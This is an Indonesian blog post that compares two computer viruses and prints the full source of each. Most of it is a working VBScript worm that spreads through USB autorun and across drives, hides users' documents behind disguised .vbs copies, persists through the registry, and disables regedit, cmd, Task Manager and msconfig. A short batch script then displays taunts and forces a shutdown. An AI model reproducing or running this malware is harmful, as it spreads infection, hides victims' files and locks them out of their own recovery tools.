RSS

VIRUS

10 Jan

Virus

Virus komputer: Sebuah kode komputer yang mampu “berbiak dengan sendirinya” yang menempelkan sebagian atau seluruh kodenya pada file atau aplikasi, dan mengakibatkan komputer Anda melakukan hal-hal yang tidak Anda inginkan.

Virus-virus komputer merupakan penyakit umum dalam dunia teknologi modern. Mereka dapat menyebar dengan cepat melalui jaringan komputer yang terbuka seperti Internet, dan mengakibatkan kerugian hingga milyaran dolar dalam waktu singkat. Lima tahun yang lalu, peluang untuk terjangkiti sebuah virus dalam periode 12 bulan adalah 1 berbanding 1000; sekarang perbandingan itu naik drastis hingga 1 berbanding 10.

Perbandingan antara 2 virus, diantaranya ;

Virus 1.

Cara kerja virus ini, ketika virus ini berjalan dia akan menyebar kesemua drive yang ada pada  komputer, sambil membuat virus baru yang bernama blutuk, sidoarjo hot, dan membuat auto run pada flashdisk, sehingga flashdisk yang terpasang akan menyemburkan virus lainnya kepada komputer yang terpasang flashdisk, kemudian folder yang ada di flashdisk akan di hidden, selain itu vieus ini akan menginveksi file berformat xls, pdf, zip, jpg dan bitmap kemudian akan mengganti beberapa value pada regedit, kemudian komputer akan merestart setelah 2000 detik.

  • Kelebihan dari virus ini akan menginfeksi flashdisk atau drive-drive yang ada dikomputer, dan merubah data yang diregedit.
  • Kekurangan dari virus ini, virus baru bisa berjalan ketika di klik.

 

Coding virus

Rem sidoarjocity4154802560
On Error Resume Next
Dim Reg, fso, Induk
Set Reg = CreateObject(“WScript.Shell”)
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set Induk = fso.GetFile(Wscript.ScriptFullName)
If Induk <> Reg.SpecialFolders(“AppData”) & “\blukutuk.vbs” then
If fso.fileExists(Left(Induk, Len(Induk) – 4)) Then
Reg.Run (Reg.RegRead(“HKCR\” & BacaHandle(“doc”) & “\shell\Open\command\”) & ” ” & chr(34) & Left(Induk, len(Induk)-3) & chr(34))
Else
Reg.Run (Reg.RegRead(“HKCR\” & BacaHandle(“doc”) & “\shell\Open\command\”) & ” ” & chr(34) & chr(34))
End If
End If
AutoFlash
Sebar1
Sebar2
Samar
Pertahanan
ShortCut
SerangFile (Left(Induk, InStrRev(Induk, ” \ “)))
SerangFolder (Left(Induk, InStrRev(Induk, ” \ “)))
SerangDrive(“c:\”)
SerangDrive(“d:\”)
SerangDrive(“e:\”)
SerangDrive(“f:\”)
SerangDrive(“g:\”)
AlwaysRun
SerangRecent

Sub AutoFlash
On Error Resume Next
Dim flashdrive, auto, tf1, tf2
For Each flashdrive In fso.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
Set auto = fso.CreateTextFile(flashdrive.Path & (“\AutoRun.inf”), True)
auto.Write (“[autorun]”& vbcrlf & “shellexecute=wscript.exe sidoarjo hot.vbs”)
auto.Close
set tf1=fso.getfile(flashdrive.path & “\AutoRun.inf”)
tf1.Attributes = 32
Induk.Copy (flashdrive.Path & “\sidoarjo hot.vbs”)
set tf2=fso.getfile(flashdrive.path & “\sidoarjo hot.vbs”)
tf2.Attributes = 32
End If
Next
End Sub

Sub SerangDrive (Lokasi)
On Error Resume Next
Dim drv
If fso.DriveExists(Lokasi) Then
Set drv = fso.GetDrive(fso.GetDriveName(Lokasi))
If drv.DriveType = 1 Or drv.DriveType = 2 Then
CopyVbs (Lokasi & “\lapindo.vbs”)
SerangFolder (Lokasi)
End If
End If
End Sub

Sub SerangFolder (Lokasi)
On Error Resume Next
If Lokasi = “” Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders(“Desktop”),3) & “Windows” then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & “\bacalah aku.vbs”)
SerangFile (target)
SerangFolder2 (target)
Next
End Sub

Sub SerangFolder2 (Lokasi)
On Error Resume Next
If Lokasi = “” Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders(“Desktop”),3) & “Windows” then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & “\duit.vbs”)
SerangFile (target)
SerangFolder3 (target)
Next
End Sub

Sub SerangFolder3 (Lokasi)
On Error Resume Next
If Lokasi = “” Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders(“Desktop”),3) & “Windows” then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & “\Hasil rapat.vbs”)
SerangFile (target)
Next
End Sub

Sub SerangFile (Lokasi)
On Error Resume Next
Dim target
For Each target In fso.GetFolder(Lokasi).Files
If lcase(Right(target,3))=”doc” then
if Left(target,2)<> “~$” then CopyVbs(target & “.vbs”)
HilangFile (target)
End If
If lcase(Right(target,3))=”xls” or lcase(Right(target,3))=”ppt” or lcase(Right(target,3))=”pdf” or lcase(Right(target,3))=”rtf” or lcase(Right(target,3))=”rar” or lcase(Right(target,3))=”zip” or lcase(Right(target,3))=”jpg” or lcase(Right(target,3))=”gif” or lcase(Right(target,3))=”bmp” then
if Left(target,2)<> “~$” then CopyVbs(Left(target, len(target)-3) & “vbs”)
End If
If lcase(Right(target,4))=”docx” or lcase(Right(target,4))=”xlsx” or lcase(Right(target,4))=”pptx” then
if Left(target,2)<> “~$” then CopyVbs(Left(target, len(target)-4) & “vbs”)
End If
if lcase(Right(target,3))=”vbs” then KillVBS(target)
Next
End sub

Sub Pertahanan
On Error Resume Next
Reg.RegWrite “HKCR\inffile\shell\Install\command\”, “logoff.exe”
Reg.RegWrite “HKCR\regfile\shell\open\command\”, “logoff.exe”
Reg.RegWrite “HKCR\VBSFile\Shell\Edit\Command\”, “logoff.exe”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit”, “1”, “REG_DWORD”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden”, “0”, “REG_DWORD”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1”, “REG_DWORD”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate”, “1”, “REG_DWORD”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1”, “REG_DWORD”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1”, “REG_DWORD”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1”, “REG_DWORD”
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD”, “1”, “REG_DWORD”
Reg.RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr”, “1”, “REG_DWORD”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”Notepad.exe”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”Notepad.exe”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”Notepad.exe”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”Notepad.exe”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger”,”Notepad.exe”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger”,”Notepad.exe”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”Notepad.exe”
Reg.Regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”Notepad.exe”
End Sub

Sub Samar
On Error Resume Next
Dim HandleDoc, HandleVbs
HandleDoc = “HKEY_CLASSES_ROOT\” & BacaHandle(“doc”)
HandleVbs = “HKEY_CLASSES_ROOT\” & BacaHandle(“VBS”)
Reg.RegWrite HandleVbs & “\”, Reg.RegRead(HandleDoc & “\”)
Reg.RegWrite HandleVbs & “\DefaultIcon\”, Reg.RegRead(HandleDoc & “\DefaultIcon\”)
Reg.RegWrite HandleVbs & “\NeverShowExt”,””
Reg.RegWrite “HKCR\VBSFile\FriendlyTypeName”, Reg.RegRead(HandleDoc & “\”)
End Sub

Sub ShortCut
On Error Resume Next
Dim lnk, lok
lok = Reg.SpecialFolders(“Favorites”) & “\blukutuk.lnk”
Set lnk = Reg.CreateShortCut(lok)
Induk.Copy (Reg.SpecialFolders(“AppData”) & “\blukutuk.vbs”)
lnk.TargetPath = Reg.ExpandEnvironmentStrings(Reg.SpecialFolders(“AppData”) & “\blukutuk.vbs”)
lnk.Save
HilangFile (lok)
Reg.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\blukutuk”, lok
End Sub

Sub HilangFile (AlamatFile)
Dim f1
Set f1 = fso.GetFile(AlamatFile)
f1.Attributes = 6
End sub

Sub CopyVbs (Alamat)
On Error Resume Next
Dim data, ts, s, a, tf
Randomize
data = Left(Rnd(15) * 10000000000, 10)
Set ts = fso.openTextFile(Induk, 1)
a = ts.ReadAll
s = Right(a, Len(a) -28)
ts.Close
Set tf = fso.CreateTextFile(Alamat, True)
tf.WriteLine (“Rem sidoarjocity” & data)
tf.Write s
tf.Close
Set ts = fso.GetFile(Alamat)
ts.Attributes = 1
End sub

Function BacaHandle(TipeFile)
BacaHandle = reg.RegRead (“HKEY_CLASSES_ROOT\.” & TipeFile & “\”)
End Function

Sub KillVBS(alamat)
On Error Resume Next
Dim ts, s, i, a, b
Set ts = fso.openTextFile(alamat, 1)
s = ts.Readline
ts.Close
a = instr(s, “sidoarjocity”)
If a = 0 Or a = “” Then
Set ts = fso.GetFile(alamat)
ts.Attributes = 0
Set ts = fso.openTextFile(Induk, 1)
i = ts.ReadAll
ts.Close
Set ts = fso.CreateTextfile(alamat, True)
ts.Write i
ts.Close
End If
End sub

sub AlwaysRun
On Error Resume Next
Dim mf, check
If Wscript.ScriptFullname = Reg.SpecialFolders(“AppData”) & “\blukutuk.vbs” then
Do
Set mf = fso.getfile(Wscript.ScriptFullname)
check = mf.Drive.drivetype
If check <> 1 Then Wscript.sleep 200000
Reg.run fso.getspecialfolder(0) & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
AutoFlash
Sebar1
SerangDrive(“d:\”)
SerangDrive(“e:\”)
Loop While check <> 1
End If
End sub

Sub Sebar1
dim nilai
nilai=Left(Reg.SpecialFolders(“Desktop”),3) & “Windows\System.vbs”
CopyVBS (nilai)
HilangFile(nilai)
SerangFolder(Reg.SpecialFolders(“MyDocuments”))
CopyVbs(Reg.SpecialFolders(“NetHood”) & “\Ceritaku.txt.vbs”)
End Sub

Sub SerangRecent
On Error Resume Next
Dim target, ok
For Each target in fso.GetFolder(Reg.SpecialFolders(“Recent”)).Files
Set ok = reg.CreateShortCut(target)
if fso.FolderExists(ok.WorkingDirectory) then SerangFolder (ok.WorkingDirectory)
Next
End sub

 

Virus 2

Virus ini menampilkan suatu message box setiap beberapa detik, dan hanya membuat komputer mati tiba-tiba.

  • Kekurangan dari virus ini, virus ini bisa dihentikan dengan menghentikan proses pada task manager.

 

Coding virus

cls

:A

color 0a

cls

@echo off

echo Wscript.Sleep 5000>C:\sleep5000.vbs

echo Wscript.Sleep 3000>C:\sleep3000.vbs

echo Wscript.Sleep 4000>C:\sleep4000.vbs

echo Wscript.Sleep 2000>C:\sleep2000.vbs

cd %systemroot%\System32

dir

cls

start /w wscript.exe C:\sleep3000.vbs

echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…

echo …………………

echo:

echo:

start /w wscript.exe C:\sleep3000.vbs

echo NEXT…………!

echo:

echo:

echo HALO SOBAT

echo MAU JADI TEMAN AKU ??

echo:

echo:

echo IM DEPRESSIVE CREW

start /w wscript.exe C:\sleep2000.vbs

echo …………

start /w wscript.exe C:\sleep4000.vbs

echo …………

echo NTAR…….!

start /w wscript.exe C:\sleep2000.vbs

echo:

echo:

echo:

echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…

cd C:\Documents and Settings\All Users\Start Menu\Programs\

mkdir DEPRESSIVE CREW

start /w wscript.exe C:\sleep3000.vbs

echo:

echo:

echo:

echo:

echo HAPPY BIRTHDAY

echo KOMPUTER KAMU BAGUS DEH

echo BOLEH Q INTIP DIKIT

echo HMM BOLEH JUGA NEH ISINYA

echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK

echo:

echo:

echo:

echo:

echo:

echo SABAR BRO…

start /w wscript.exe C:\sleep3000.vbs

echo ………..

echo zzzzzzz….

echo:

echo:

start /w wscript.exe C:\sleep3000.vbs

echo OKE….Virus AKTIF!

echo:

echo:

echo:

start /w wscript.exe C:\sleep2000.vbs

echo FIREWALL KAMU HANCUR…

start /w wscript.exe C:\sleep2000.vbs

echo SEMUA PROSESS UDAH DIBANTAI…

start /w wscript.exe C:\sleep2000.vbs

echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…

start /w wscript.exe C:\sleep2000.vbs

echo:

echo:

echo:

echo VIRUS MASUK PODIUM AKHIR!

start /w wscript.exe C:\sleep2000.vbs

echo:

echo:

echo I LOVE U FULL

echo HA HA HA HA

echo:

echo:

echo:

echo:

start /w wscript.exe C:\sleep2000.vbs

pause

shutdown -f -s -c “KOMPUTER ANDA AKAN MATI DALAM HITUNGAN DETIK!!!”

Perbedaan dari kedua virus ini, kalau virus lapindo tidak bisa dimatikan oleh proses, dan secara langsung menyebar.

 
Tinggalkan komentar

Ditulis oleh pada Januari 10, 2012 in categorized

 

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: